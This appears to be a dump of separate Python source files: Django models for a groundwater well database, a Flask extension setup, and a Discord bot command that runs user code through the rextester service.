"boundary_effect":"Identification of any boundary effects observed during hydraulic testing (e.g. specified head to represent streams or no-flow to represent a low conductivity interface) ",
"hydraulic_conductivity":"Hydraulic conductivity estimated from hydraulic testing in metres per second.",
"specific_storage":"Specific Storage estimated from hydraulic testing in units of per metre of aquifer thickness.",
"specific_yield":"Specific Yield estimated from hydraulic testing (dimensionless).",
"storativity":"Storativity estimated from hydraulic testing (dimensionless).",
"testing_duration":"The duration of the hydraulic testing period. For consistency, do not include the recovery period.",
"testing_method":"Identification of the testing method (e.g.basic pumping test, pumping test with monitoring wells, single-well-response/slug test, constant head).",
"transmissivity":"Transmissivity estimated from hydraulic testing.",
"well_tag_number":"System generated sequential number assigned to each well. It is widely used by groundwater staff as it is the only consistent unique identifier for each well. It is different from a well ID plate number.",
}
def __str__(self):
return '{} - {}'.format(self.well, self.hydraulic_property_guid)
class DecommissionMaterialCode(BasicCodeTableModel):
"""Codes for decommission materials"""
code = models.CharField(primary_key=True, max_length=30,
db_column='decommission_material_code')
description = models.CharField(max_length=100)
db_table_comment = ('Describes the material used to fill a well when decomissioned. E.g. Bentonite'
' chips, Native sand or gravel, Commercial gravel/pea gravel.')
def __str__(self):
return '{} - {}'.format(self.code, self.description)
class DecommissionDescription(AuditModel):
"""Provides a description of the ground conditions (between specified start and end depth) for
decommissioning"""
decommission_description_guid = models.UUIDField(
primary_key=True, default=uuid.uuid4)
activity_submission = models.ForeignKey(ActivitySubmission, db_column='filing_number',
on_delete=models.PROTECT, blank=True, null=True,
related_name='decommission_description_set')
well = models.ForeignKey(
Well, db_column='well_tag_number', on_delete=models.PROTECT, blank=True,
null=True, related_name='decommission_description_set',
db_comment=('System generated sequential number assigned to each well. It is widely used by groundwater staff as it is the only consistent unique identifier for each well. It is different from a well ID plate number.'))
start = models.DecimalField(db_column='decommission_description_from', max_digits=7, decimal_places=2,
verbose_name='Decommissioned From', blank=False,
validators=[MinValueValidator(Decimal('0.00'))])
end = models.DecimalField(db_column='decommission_description_to', max_digits=7, decimal_places=2,
verbose_name='Decommissioned To', blank=False,
validators=[MinValueValidator(Decimal('0.01'))])
material = models.ForeignKey(DecommissionMaterialCode, db_column='decommission_material_code',
on_delete=models.PROTECT)
observations = models.CharField(max_length=255, null=True, blank=True)
db_table_comment = ('A cross refernce table maintaining the list of wells that have been decomissioned'
' and the materials used to fill the well when decomissioned. E.g. Bentonite chips,'
' Native sand or gravel, Commercial gravel/pea gravel.')
|
from flask_login import LoginManager
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
login_manager = LoginManager()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Nekozilla is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Nekozilla is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Nekozilla. If not, see <https://www.gnu.org/licenses/>.
"""
Rextester cog interface.
"""
import neko3.cog
import neko3.converters
from neko3 import neko_commands
from neko3 import pagination
from . import utils
from .toolchains import rextester
class RextesterCog(neko3.cog.CogBase):
@neko_commands.group(
name="rextester",
invoke_without_command=True,
aliases=["rxt", "cc", "compile"],
brief="Attempts to execute the code using [rextester.](http://rextester.com)",
)
async def rextester_group(self, ctx, *, source):
"""
Attempts to execute some code by detecting the language in the
syntax highlighting. You MUST format the code using markdown-formatted
code blocks. Please, please, PLEASE read this before saying "it is
broken!"
This provides many more languages than coliru does, however, it is
mainly untested and will probably break in a lot of places. It also
has much less functionality. Many languages have to be formatted
in a specific way or have specific variable names or namespaces.
Run `cc help` to view a list of the supported languages, or
`cc help <lang>` to view the help for a specific language.
"""
code_block = utils.code_block_re.search(source)
if not code_block or len(code_block.groups()) < 2:
booklet = pagination.StringNavigatorFactory()
booklet.add_line(
"I couldn't detect a valid language in your "
"syntax highlighting... try again by editing "
"your initial message."
)
booklet = booklet.build(ctx)
return await utils.start_and_listen_to_edit(ctx, booklet)
# Extract the code
language, source = code_block.groups()
language = language.lower()
if language not in rextester.Language.__members__:
booklet = pagination.StringNavigatorFactory()
booklet.add_line("Doesn't look like I support that language. " "Run `coliru help` for a list.")
booklet = booklet.build(ctx)
return await utils.start_and_listen_to_edit(ctx, booklet)
booklet = pagination.StringNavigatorFactory(prefix="```markdown", suffix="```", max_lines=15)
lang_no = rextester.Language.__members__[language]
async with ctx.typing():
response = await rextester.execute(lang_no, source)
if response.errors:
booklet.add_line("> ERRORS:")
booklet.add_line(response.errors)
if response.warnings:
booklet.add_line("> WARNINGS:")
booklet.add_line(response.warnings)
if response.result:
booklet.add_line("> OUTPUT:")
booklet.add_line(response.result)
booklet.add_line(f"Interpreted as {language.lower()} source; {response.stats}")
if response.files:
booklet.add_line(f"- {len(response.files)} file(s) included. Bug my dev to implement this properly!")
booklet = booklet.build(ctx)
await utils.start_and_listen_to_edit(ctx, booklet)
@rextester_group.command(name="help", brief="Shows help for supported languages.")
async def help_command(self, ctx, *, language: neko3.converters.clean_content = None):
"""
Shows all supported languages and their markdown highlighting
syntax expected to invoke them correctly.
"""
if not language:
booklet = pagination.StringNavigatorFactory(max_lines=20)
booklet.add_line("**Supported languages**")
for lang in sorted(rextester.Language.__members__.keys()):
lang = lang.lower()
booklet.add_line(f"- {lang.title()} -- `{ctx.prefix}rxt " f"ˋˋˋ{lang} ...`")
booklet.start(ctx)
else:
await ctx.send("There is nothing here yet. The developer has been shot as a result.")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.